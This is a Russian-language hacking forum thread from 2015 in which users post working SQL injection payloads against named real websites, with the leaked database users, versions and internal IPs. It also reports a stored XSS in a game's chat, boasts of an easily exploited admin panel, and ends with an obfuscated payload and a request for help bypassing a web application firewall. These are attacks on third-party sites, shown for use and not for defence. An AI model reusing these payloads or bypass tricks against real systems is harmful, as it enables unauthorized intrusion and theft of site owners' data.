 |
|
11.05.2015, 00:56
|
|
Участник форума
Регистрация: 10.05.2015
Сообщений: 142
С нами:
5795606
Репутация:
57
|
|
Демонстрация SQLi от меня
|
|
|
11.05.2015, 01:00
|
|
Участник форума
Регистрация: 10.05.2015
Сообщений: 142
С нами:
5795606
Репутация:
57
|
|
SQLi на сайте bitbank
|
|
|
|
11.05.2015, 01:01
|
|
Участник форума
Регистрация: 10.05.2015
Сообщений: 142
С нами:
5795606
Репутация:
57
|
|
Сообщение от BabaDook
↑
bidderland.co.in/siteadmi
n
Эта уязвимость эксплуатируется за 5 секунд.
нашёл не я , но она очень интересная, не типичная. Кто догнал прошу оставить это в секрете.
Да да 5 сек даже много)))
|
|
|
|
11.05.2015, 08:49
|
|
Новичок
Регистрация: 11.05.2015
Сообщений: 3
С нами:
5794166
Репутация:
1
|
|
Внесу и я свои первые 5 копеек
http://www.leong-leong.com/press.ph...,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29 -- |
|
|
|
11.05.2015, 09:15
|
|
Новичок
Регистрация: 08.05.2015
Сообщений: 7
С нами:
5798486
Репутация:
0
|
|
http://java.lordy.ru/
Есть жаба игра, зарегавшись, в чате можно написать ">alert(XSS)", после этого на java.lordy.ru высветится XSS.
|
|
|
|
11.05.2015, 16:24
|
|
Участник форума
Регистрация: 08.05.2015
Сообщений: 200
С нами:
5798486
Репутация:
28
|
|
Код HTML:
http://www.jhewlett.com/content/humor.php?id=10%27+and+1=-0+union+select+user%28%29,group_concat%28database%28%29,0x3a,version%28%29%29+--+
jhewlett_r@209.68.5.201
jhewlett_prod:5.0.96-log
Код HTML:
http://nightgallery.ca/event.php?id=91+or+1+group%20by%20concat_ws%280x2a,version%28%29,user%28%29,database%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--+
5.0.96-log
nightgallery20@72.167.232.44
nightgallery20
Код HTML:
http://www.australianpaddlesurfer.com.au/review.php?id=113+or+2+group%20by%20concat_ws%280x2f,version%28%29,user%28%29,database%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--+
10.0.17-MariaDB-cll-lve
austral3_casso@server-2h-r34.ipv4.au.syr
Код HTML:
http://www.novagora.net/rub.php?Rub=0&IDR=5+and+2=0+union+select+1,2,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,4,5+--+
4.0.26-standard-log
novagoraTest
novagoraTest@10.0.5.18 |
|
|
|
11.05.2015, 16:53
|
|
Участник форума
Регистрация: 13.01.2013
Сообщений: 157
С нами:
7015286
Репутация:
2
|
|
|
|
|
|
11.05.2015, 19:44
|
|
Новичок
Регистрация: 09.05.2015
Сообщений: 27
С нами:
5797046
Репутация:
7
|
|
Код HTML:
http://www.oar.org.ro/press.php?id=-1%20union%20all%20select%20null,null,null,version%28%29,null,null%20--
Версия: 5.6.23
User: oarorgro_oar@localhost |
|
|
|
11.05.2015, 19:54
|
|
Новичок
Регистрация: 11.05.2015
Сообщений: 3
С нами:
5794166
Репутация:
1
|
|
|
|
|
|
12.05.2015, 00:54
|
|
Участник форума
Регистрация: 10.05.2015
Сообщений: 142
С нами:
5795606
Репутация:
57
|
|
http://goo.gl/uMgvlO
Код:
http://www.perio.com.ua/articles.php?id=.13 and @b:=current_user()+/*!50000UNIoN+Select*/+1,concat/*_*/(0x3c7370616e207374796c653d22666f6e742d66616d696c793a4963656c616e643b636f6c6f723a7265643b73697a653a353b746578742d736861646f773a23303030203070782030707820337078223e4d69737465725f42657274306e693c62723e,0x4461746162617365203a3a202020,DATABASE/**_**/(),0x3c62723e506f727420203a3a2020,@@port,0x3c62723e43757272656e745f55736572203a3a202020203a3a ,@b,0x3c62723e56657273696f6e206f66204461746162617365203a3a2020,VERSION(),0xa3c62723e486f73746e616d65203a3a20,0x3c2f7370616e3e,@@HOSTNAME),3,1337,5,6 -- -
Может кто знает как здесь WAF на information_schema обойти?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
